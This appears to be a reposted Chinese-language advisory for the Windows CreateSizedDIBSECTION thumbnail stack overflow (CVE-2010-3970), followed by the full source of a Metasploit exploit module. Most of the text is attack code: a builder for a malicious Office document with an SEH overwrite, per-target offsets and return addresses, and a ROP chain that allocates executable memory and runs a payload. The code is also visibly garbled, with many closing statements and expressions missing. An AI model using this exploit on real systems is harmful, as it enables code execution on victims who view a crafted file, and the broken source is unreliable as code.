Microsoft Windows "CreateSizedDIBSECTION()"


    Microsoft Windows XP Professional
    Microsoft Windows Vista SP2
    Microsoft Windows Vista SP1
    Microsoft Windows Vista 
    Microsoft Windows Server 2008
    Microsoft Windows Server 2003

    Microsoft Windows的Windows Graphics Rendering Engine在实现上存在远程栈缓冲区溢出漏洞,远程攻击者可利用此漏洞通过诱使用户访问恶意网页或打开处理恶意Office文档破坏内存执行任意代码或造成拒绝服务。

    Msf(Metasploit Framework)前几天已经更新。


# $Id: ms11_xxx_createsizeddibsection.rb 11466 2011-01-04 15:30:29Z jduck $

# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = GreatRanking

 include Msf::Exploit::FILEFORMAT
 include Msf::Exploit::Seh

 def initialize(info = {})
   'Name'           => 'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow',
   'Description'    => %q{
     This module exploits a stack-based buffer overflow in the handling of thumbnails
    within .MIC files and various Office documents. When processing a thumbnail bitmap
    containing a negative 'biClrUsed' value, a stack-based buffer overflow occurs. This
    leads to arbitrary code execution.

    In order to trigger the vulnerable code, the folder containing the document must be
    viewed using the "Thumbnails" view.
   'License'        => MSF_LICENSE,
   'Author'         =>
     'Moti & Xu Hao',  # original discovery
     'Yaniv Miron aka Lament of ilhack',
     'jduck'           # Metasploit module
   'Version'        => '$Revision: 11466 $',
   'References'     =>
     [ 'CVE', '2010-3970' ],
     #[ 'OSVDB', '?????' ],
     #[ 'MSB', 'MS11-XXX' ],
     #[ 'BID', '????' ],
     [ 'URL', '' ]
   'DefaultOptions' =>
     'EXITFUNC' => 'seh',
     'AutoRunScript' => 'migrate -f'
   'Payload'        =>
     'Space'         => 512,
     'BadChars'      => "\x00",
     'DisableNops'   => true # no need
   'Platform'       => 'win',
   'Targets'        =>
     # This automatic target will combine all targets into one file :)
     [ 'Automatic', { } ],

     # Windows 2000 is a soft target... You're not still using it are you?
     [ 'Windows 2000 SP0/SP4 English',
       'Offset' => 1548,   # Offset to SEH frame
       'Ret' => 0x75022ac4 # p/p/r ws2help.dll v5.0.2134.1

     # My test machine didn't have l3codeca.acm loaded (as mentioned in their slides)
     # However, it did have msacm32.drv
     [ 'Windows XP SP3 English',
       'Offset' => 1560,    # Offset to SEH frame
       # Address from msacm32.drv v5.1.2600.0
       'Ret' => 0x72d11676,  # push esi / mov esi,[esp+0xc] / push [esi+0x54] / call [esi+0x5c]

       # This ends up becoming eip due to above SafeSEH bypass
       'PivotOffset' => 1652,
       'RopStart' => 592

     [ 'Windows Server 2003 SP2',
       'Offset' => 1576,    # Offset to SEH frame
       'Ret' => 0xfeedfed5

       # rop is possible with l3codeca.acm, but its not clear how to force it to be loaded.
       # Also, it changed in Feburary 2010 ...

     # crash on a deref path to heaven.
     [ 'Crash Target for Debugging',
       'Ret' => 0xdac0ffee
   'DefaultTarget' => 0,
   'DisclosureDate' => 'Dec 15 2010'))

   ['FILENAME', [ true, 'The file name.',  'msf.doc']),
   ], self.class)

 def exploit

  print_status("Creating '#{datastore['FILENAME']}' file ...")

  out = File.expand_path(File.join(datastore['OUTPUTPATH'], datastore['FILENAME']))
  stg =, Rex::OLE::STGM_WRITE)
  if (not stg)
   raise RuntimeError, 'Unable to create output file'

  stm = stg.create_stream("\x05SummaryInformation")
  if (not stm)
   raise RuntimeError, 'Unable to create SummaryInformation stream'
  stm << generate_summaryinfo()


  print_status("Generated output file #{out}")


 def generate_summaryinfo
  si =

  ps =

  bihdr = [
   0x08,  # ??
   0x28,  # biSize (struct size)
   0x50,  # biWidth
   0x58,  # biHeight
   0x01,  # biPlanes
   0x08,  # biBitCount
   0x00,  # biCompression
   0xa8c0,  # biSizeImage
   0x00,  # biXPelsPerMeter
   0x00,  # biYPelsPerMeter
   # biClrUsed
   0x00   # biClrImportant

  # ClipboardData
  data = rand_text(8192)
  data[0, bihdr.length] = bihdr
  data[48, payload.encoded.length] = payload.encoded

  if == "Automatic"
   targets.each { |t|
    next if !~ /Windows/i

    add_target(data, t)
   add_target(data, target)

  prop =, Rex::OLE::VT_CF, data)
  ps << prop
  si << ps


 def add_target(data, targ)
  if targ['PivotOffset'] and targ['RopStart']
   data[targ['Offset'] + 4, 4] = [targ.ret].pack('V')

   rvas = rvas_explorer_xpsp3()
   rop = generate_rop(rvas)

   pivot = rva2addr(rvas, 'add ebp, [edx+6] / pop eax / leave / ret 4')
   data[targ['PivotOffset'], 4] = [pivot].pack('V')

   data[targ['RopStart'], rop.length] = rop
   seh = generate_seh_record(targ.ret)
   distance = targ['Offset'] + seh.length
   distance -= 48  # the entire source buffer isn't copied
   seh << Metasm::Shellcode.assemble(, "jmp $-" + distance.to_s).encode_string

   data[targ['Offset'], seh.length] = seh

 def rvas_explorer_xpsp3()
  # explorer.exe version v6.0.2900.5512
  # Just return this hash
   'add ebp, [edx+6] / pop eax / leave / ret 4' => 0x2be9c,
   'ret'                    => 0x3ebd,

   'int3 / ... / ret'       => 0x1922f,

   'mov eax, esi / pop edi / pop esi / ret' => 0x2648,
   'pop ebp / ret'          => 0x3ebc,
   'add eax, ebp / ret'     => 0x13124,
   'mov eax, [eax] / ret'   => 0x74b7,

   'pop ebx / ret'          => 0x4bd5,
   'push eax / call ebx'    => 0xedc7,
   'pop edi / pop esi / ret' => 0x23bb,

   'pop ecx / ret'          => 0x1acd9,
   'call [ecx] / pop ebp / ret 0x10' => 0x2ad52,

   'pop edi / ret'          => 0x319bc,

   'lea edi, [eax+0x1c] / rep movsd / pop edi / pop esi / ret' => 0x88c4,

   'mov [eax], ecx / pop ebp / ret 4' => 0xa747,
   'jmp eax'                => 0x2080

 def generate_rop(rvas)
  # ROP fun! (XP SP3 English, Dec 29 2010)
   # Instructions / Name    => RVA
   'BaseAddress'            => 0x01000000,
   'imp_VirtualAlloc'       => 0x11e8,
   'Scratch'                => 0x46060

  rop_stack = [
   :unused,  # from pivot

   # First, get the address of our source buffer in relation to the
   # SEH record pointer now saved in ESI
   'mov eax, esi / pop edi / pop esi / ret',

   'pop ebp / ret',
   'add eax, ebp / ret',

   'pop ebx / ret',
   'pop edi / pop esi / ret',
   'push eax / call ebx',

   # Allocate an RWX memory segment
   'pop ecx / ret',

   'call [ecx] / pop ebp / ret 0x10',
   0,         # lpAddress
   0x1000,    # dwSize
   0x3000,    # flAllocationType
   0x40,      # flProt

   # Copy the original payload
   'pop ecx / ret',
   0x80,      # dwords to copy

   'lea edi, [eax+0x1c] / rep movsd / pop edi / pop esi / ret',

   # Add a jump over the space/crap
   'pop ecx / ret',

   'mov [eax], ecx / pop ebp / ret 4',

   'jmp eax'
  ]! { |e|
   if e.kind_of? String
    # Meta-replace (RVA)
    raise RuntimeError, "Unable to locate key: \"#{e}\"" if not rvas[e]
    rvas['BaseAddress'] + rvas[e]

   elsif e == :unused
    # Randomize

    # Literal


 def rva2addr(rvas, key)
  raise RuntimeError, "Unable to locate key: \"#{key}\"" if not rvas[key]
  rvas['BaseAddress'] + rvas[key]
